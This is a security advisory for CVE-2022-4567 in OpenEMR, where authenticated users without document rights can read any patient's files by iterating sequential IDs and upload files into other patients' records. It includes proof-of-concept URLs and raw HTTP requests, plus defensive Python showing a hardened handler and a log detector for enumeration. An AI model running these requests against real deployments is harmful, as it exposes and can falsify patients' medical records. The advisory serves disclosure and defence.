CVE-2022-4567: Broken Access Controls in Patient Files in openemr

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.


Description

An authenticated user without document access can directly retrieve any document in the system by requesting a URL of the form http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19. Because both patient_id and document_id are autoincrement identifiers, they can also be brute-forced by simply iterating over small integers.

A second instance allowed an authenticated user without document access to upload a file into any user's document repository.

Proof of Concept

The first instance lets any authenticated user retrieve a document by referencing its patient_id and document_id:

http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19

The second instance affects the upload handler. The following request illustrates it:

POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1
Host: REDACTED
(...snip...)
Upgrade-Insecure-Requests: 1

-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="file[]"; filename="testBAC.txt"
Content-Type: text/plain

TESTFILE
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream

(...snip...)
-----------------------------247482557730593022112237721191--

The response displayed the message "Documents Not Authorized", but the file was nevertheless stored and could be retrieved afterwards through the first issue:

REQUEST:
GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
(...snip...)

RESPONSE:
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 16:07:36 GMT
Server: Apache/2.4.54 (Debian)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="testBAC.txt"
Content-Length: 8
Connection: close
Content-Type: text/plain;charset=utf-8

TESTFILE
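The two failure modes shown above reduce to a small model: on retrieve there is no authorization check at all, and on upload the check produces the "Documents Not Authorized" message but the file has already been written (the check either runs after the write or its outcome is not enforced; the model below assumes the former). The following Python is an added illustration, not OpenEMR code: the grant name patients/docs, the DocumentStore, the status tuples and all function names are assumptions, and only the observed behaviour and the error message come from the advisory.

```python
from dataclasses import dataclass, field

ACL_DOCS = "patients/docs"                   # assumed name of the document-access grant
NOT_AUTHORIZED = "Documents Not Authorized"  # message quoted in the advisory


@dataclass
class User:
    name: str
    grants: set = field(default_factory=set)


@dataclass
class DocumentStore:
    """Toy store keyed by (patient_id, document_id); ids autoincrement as in the advisory."""
    docs: dict = field(default_factory=dict)
    next_id: int = 1

    def store(self, patient_id, data):
        doc_id = self.next_id
        self.next_id += 1
        self.docs[(patient_id, doc_id)] = data
        return doc_id

    def fetch(self, patient_id, document_id):
        # Lookup is scoped to the patient: an id belonging to another patient is a miss.
        return self.docs.get((patient_id, document_id))


def has_document_access(user):
    return ACL_DOCS in user.grants


# --- vulnerable behaviour, modelled on the advisory -----------------------------

def vulnerable_retrieve(store, user, patient_id, document_id):
    """No authorization check: any logged-in user receives the bytes."""
    data = store.fetch(patient_id, document_id)
    return (404, None) if data is None else (200, data)


def vulnerable_upload(store, user, patient_id, data):
    """The ACL is consulted, but only after the write, so the caller sees the
    error text while the file is already persisted (assumed ordering)."""
    doc_id = store.store(patient_id, data)
    if not has_document_access(user):
        return (200, NOT_AUTHORIZED, doc_id)
    return (200, "Uploaded", doc_id)


# --- hardened behaviour ------------------------------------------------------------

def hardened_retrieve(store, user, patient_id, document_id):
    """Deny before touching the store; patient-scoped lookup stops cross-patient ids."""
    if not has_document_access(user):
        return (403, None)
    data = store.fetch(patient_id, document_id)
    return (404, None) if data is None else (200, data)


def hardened_upload(store, user, patient_id, data):
    """Deny before any side effect; nothing is written for an unauthorized caller."""
    if not has_document_access(user):
        return (403, NOT_AUTHORIZED, None)
    doc_id = store.store(patient_id, data)
    return (200, "Uploaded", doc_id)


def demo():
    """Replay the advisory's scenario against both implementations."""
    store = DocumentStore()
    intruder = User("lowpriv")                  # authenticated, no document grant
    store.store(2, b"existing record")          # patient 2, document 1 (constructed)

    results = {}
    results["vuln_retrieve"] = vulnerable_retrieve(store, intruder, 2, 1)[0]
    results["hard_retrieve"] = hardened_retrieve(store, intruder, 2, 1)[0]

    _, msg, new_id = vulnerable_upload(store, intruder, 2, b"TESTFILE")
    results["vuln_upload_msg"] = msg
    results["vuln_upload_persisted"] = store.fetch(2, new_id) == b"TESTFILE"

    status, _, new_id = hardened_upload(store, intruder, 2, b"TESTFILE")
    results["hard_upload_status"] = status
    results["hard_upload_persisted"] = new_id is not None
    results["docs_total"] = len(store.docs)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the hardened variants is ordering: the authorization decision is made before any read or write, and a denial returns without leaving state behind, so a "not authorized" message can never coexist with a stored file.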

Impact

Any authenticated user of the platform can bypass the document access restrictions and download any document belonging to any patient in the system. It is also possible to inject a document into any patient's record, which could be used to plant malicious or falsified content that is then treated as valid medical data.
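Because both identifiers are sequential, exploitation of the retrieve issue shows up in the web server access log as one client walking consecutive document_id values, often across several patient_id values. The detector below is an added example, not part of the advisory or of OpenEMR: the log lines are constructed in Apache combined format (the server in the response above is Apache) and the two thresholds are assumptions to be tuned for a real deployment.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2022:16:07:30 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=17 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2022:16:07:31 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=18 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2022:16:07:32 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=19 HTTP/1.1" 200 8 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2022:16:07:33 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=3&document_id=20 HTTP/1.1" 200 8 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Oct/2022:16:07:34 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=3&document_id=21 HTTP/1.1" 200 8 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Oct/2022:16:08:01 +0000] "GET /openemr/controller.php?document&retrieve&patient_id=7&document_id=44 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Oct/2022:16:09:10 +0000] "GET /openemr/interface/main/main_screen.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_document_requests(text):
    """Yield (client_ip, patient_id, document_id) for each document retrieve request."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        if not url.path.endswith("/controller.php"):
            continue
        # "document" and "retrieve" are bare flags, so keep blank values to see them.
        qs = parse_qs(url.query, keep_blank_values=True)
        if "document" not in qs or "retrieve" not in qs:
            continue
        try:
            yield (m["ip"], int(qs["patient_id"][0]), int(qs["document_id"][0]))
        except (KeyError, ValueError):
            continue


def find_enumeration(text, min_run=3, min_patients=2):
    """Flag clients whose retrieved document_ids form a sequential run of at least
    min_run, or that touch at least min_patients distinct patients (thresholds assumed)."""
    per_client = defaultdict(list)
    for ip, patient_id, document_id in parse_document_requests(text):
        per_client[ip].append((patient_id, document_id))

    findings = {}
    for ip, reqs in per_client.items():
        doc_ids = sorted({d for _, d in reqs})
        longest = run = 1
        for a, b in zip(doc_ids, doc_ids[1:]):
            run = run + 1 if b == a + 1 else 1
            longest = max(longest, run)
        patients = {p for p, _ in reqs}
        if longest >= min_run or len(patients) >= min_patients:
            findings[ip] = {
                "sequential_run": longest,
                "patients": len(patients),
                "documents": len(doc_ids),
            }
    return findings


if __name__ == "__main__":
    for ip, detail in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {detail}")
```

A legitimate clinician opening a patient's chart usually fetches a handful of documents for one patient, so a single client spanning multiple patients with consecutive ids is the signal to alert on; correlate the client with the authenticated OpenEMR session before acting, since the access log alone does not identify the user.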
